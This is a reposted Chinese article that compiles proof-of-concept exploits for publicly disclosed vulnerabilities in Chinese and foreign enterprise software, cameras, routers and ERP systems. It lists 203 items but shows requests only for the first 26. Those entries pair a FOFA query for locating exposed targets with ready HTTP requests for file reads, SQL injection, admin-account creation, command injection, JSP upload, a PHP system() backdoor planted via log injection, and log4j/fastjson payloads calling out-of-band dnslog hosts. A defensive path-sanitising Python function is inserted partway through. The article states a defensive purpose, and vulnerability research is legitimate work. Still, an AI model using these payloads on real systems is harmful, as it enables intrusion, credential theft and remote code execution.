
Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises; we hope this article helps with defence. Defenders can use its contents for risk checks.

Sources: the article covers 203 PoCs for high-severity vulnerabilities disclosed publicly, in China and abroad, between September 2023 and May 2024. All were taken from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation advice, contact the product vendor.

Content: because of length limits, a few PoCs that are too long are replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DAS-Security (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DAS-Security 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 construction quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

The password field is the MD5 of the chosen password.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"

Log in to the admin backend with the default account admin, then send the following request.

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain the cookies.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the injected PHP executes the base64-decoded value of a request header.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The leaked data includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The PoC calls a database function that computes the MD5 of 1234.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

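Entries 2, 6, 7, 13 and 20 are the same defect seen five times: a user-supplied path or URL is handed to a file read without first being confined to the directory the handler is meant to serve. The function below is an added example written for this repost, not code from the original article or from any of the products listed; it shows the checks a file-serving handler should apply before opening anything: decode twice (entry 9 shows payloads arriving double-encoded), reject NUL bytes, URL schemes (`file:` as in entry 20) and drive letters (`c:/` as in entry 13), refuse any `..` segment, and confirm that the normalised result still lies under the base directory. The base directory `/srv/app/static`, the `safe_join`/`is_servable` names and the sample requests are assumed values chosen for illustration.

```python
"""Confine an untrusted path to a base directory before reading a file.

Added example for this post; not taken from the original article or from
any of the products it lists. The base directory and sample inputs are
assumed values chosen for illustration.
"""
import posixpath
import re
from urllib.parse import unquote


class UnsafePath(ValueError):
    """Raised when a requested path must not be served."""


DRIVE_RE = re.compile(r"^[A-Za-z]:")


def safe_join(base_dir, user_path):
    """Map user_path onto base_dir and return the absolute path to serve.

    Raises UnsafePath on anything that would escape base_dir. POSIX path
    rules are used deliberately so the behaviour is identical on every OS.
    """
    # Decode twice: entry 9 shows percent-encoding applied two times, and a
    # single decode would leave '%252e%252e' style traversal unrecognised.
    decoded = unquote(unquote(user_path))
    if "\x00" in decoded:
        raise UnsafePath("NUL byte in path")
    if "://" in decoded or decoded.lower().startswith("file:"):
        raise UnsafePath("URL scheme not allowed")
    # Treat backslashes as separators and every request as relative to base.
    rel = decoded.replace("\\", "/").lstrip("/")
    if DRIVE_RE.match(rel):
        raise UnsafePath("drive letter not allowed")
    if any(part == ".." for part in rel.split("/")):
        raise UnsafePath("parent-directory reference")
    base = posixpath.normpath(base_dir)
    full = posixpath.normpath(posixpath.join(base, rel))
    # Belt and braces: the normalised result must still sit under base.
    if posixpath.commonpath([base, full]) != base:
        raise UnsafePath("path escapes base directory")
    return full


def is_servable(base_dir, user_path):
    """Boolean wrapper around safe_join for bulk checks."""
    try:
        safe_join(base_dir, user_path)
        return True
    except UnsafePath:
        return False


# Constructed inputs modelled on entries 2, 6, 13 and 20, plus encoded variants.
SAMPLE_REQUESTS = [
    "css/site.css",
    "../../../../../../../../../etc/passwd",
    "/etc/./passwd",
    "c:/windows/win.ini",
    "file:/etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",
    "..%252f..%252fetc/passwd",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        try:
            print(f"{req!r:42} -> {safe_join('/srv/app/static', req)}")
        except UnsafePath as exc:
            print(f"{req!r:42} -> rejected ({exc})")
```

Note that an absolute request such as `/etc/./passwd` is not rejected but re-rooted under the base directory, which is the behaviour a static-file handler wants; the leading slash carries no meaning there. Refusing every `..` segment outright is stricter than strictly necessary, but it removes the whole class of normalisation arguments and keeps the final `commonpath` check as a second, independent guard.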
21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
